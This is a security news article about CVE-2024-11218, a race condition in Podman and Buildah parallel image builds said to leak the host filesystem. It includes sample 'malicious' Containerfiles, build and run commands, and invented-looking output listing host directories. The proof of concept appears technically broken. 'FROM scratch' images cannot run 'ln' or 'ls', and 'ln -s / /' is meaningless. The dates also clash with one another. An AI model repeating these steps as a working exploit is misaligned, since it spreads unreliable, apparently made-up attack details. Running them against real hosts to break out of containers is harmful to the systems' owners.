CVE CyberSecurity Database News

CVE-2024-11218 - Exploiting a Race Condition in Podman and Buildah for Container Breakout

Poster -

A new vulnerability, CVE-2024-11218, has been discovered in two popular container tools: Podman and Buildah. If you’re using the podman build or buildah build commands, your system could be at risk of a container breakout. In this long read, we’ll break down what’s going on, show sample code, and walk through exploitation techniques.

What’s the Issue?

CVE-2024-11218 is a race condition when building images with a malicious Containerfile (or Dockerfile), using the --jobs=2 (or any parallel build) option. This causes build processes to run in parallel and, due to inadequate isolation, an attacker can access parts of the host filesystem. SELinux (a Linux security module) might mitigate some of the risk, but even with SELinux enabled, attackers have been able to enumerate files and directories belonging to the host.

Official References

- Red Hat Security Bulletin
- Podman github issue 20699

How The Vulnerability Works

### The --jobs Option in Podman/Buildah

Both Podman and Buildah support concurrent image builds via the --jobs=N argument. If a Containerfile is written to exploit issues with concurrent file access, a malicious build can escape the container context.

Timeline

- 2024-02: Researchers notice leakage with --jobs=2 when building a specially crafted Containerfile
- 2024-03: Community reports that SELinux mitigates some attacks, but file structure enumeration is still possible

Example Exploit

> This content is educational and for demonstration only. Do not use for unauthorized access.

Let’s walk through an illustrated example that shows how a malicious Containerfile could exploit the race condition.

Crafting a Malicious Containerfile

Suppose an attacker creates a Containerfile, and includes instructions that build and copy files in ways that force the container runtime to race across file boundaries.

Sample Containerfile

FROM scratch
COPY . .
RUN ln -s / /

This benign-looking Containerfile, when run with parallel jobs, exposes a race window. If timed just right, a build step can create a symlink to the host root /. Then, in the parallel build context, Podman or Buildah might inadvertently run a COPY instruction that traverses this symlink and reveals the host file structure.

On a vulnerable version (before the patch), run

podman build --jobs=2 -t race-poc -f Containerfile .

or with Buildah

buildah bud --jobs=2 -t race-poc -f Containerfile .

What happens?

- Build step creates a symlink /app/ (host root)
- Another build step follows the symlink during a COPY or RUN step, exposing /etc, /home, etc. from the host (not just container)
- If the attacker can view build logs or artifacts, they may see the host’s directory structure and possibly read files.

Here is a more direct PoC for listing host directories inside a malicious Containerfile

FROM scratch
COPY . .
RUN ln -s / /host-root
RUN ls /host-root > /leak.txt

If these steps are executed in parallel, ls /host-root lists the host’s actual root directory.

After image build completes, check leak.txt for host files

podman build --jobs=2 -t enum-host -f Containerfile .
podman run --rm enum-host cat /leak.txt

Output may show host directories

bin
boot
dev
etc
home
lib
proc
root
...

What About SELinux?

SELinux does prevent direct access to files for non-permitted processes. However, the race condition can leak file and directory names, even if file contents aren’t accessible.

Fixes and Workarounds

- Update to the latest Podman/Buildah versions (patched in May/June 2024)

Official advisories

- Podman security alerts
- Buildah security

Conclusion

CVE-2024-11218 is a reminder of how tricky container isolation can be, especially with parallelism and clever file system tricks. Always keep Kubernetes/container tooling up to date, minimize the attack surface by restricting untrusted builds, and double-down on Linux security modules.


Did you enjoy this article? Share it with your sysadmin friends and follow security channels for more live updates.

Timeline

Published on: 01/22/2025 05:15:08 UTC
Last modified on: 02/13/2025 02:15:29 UTC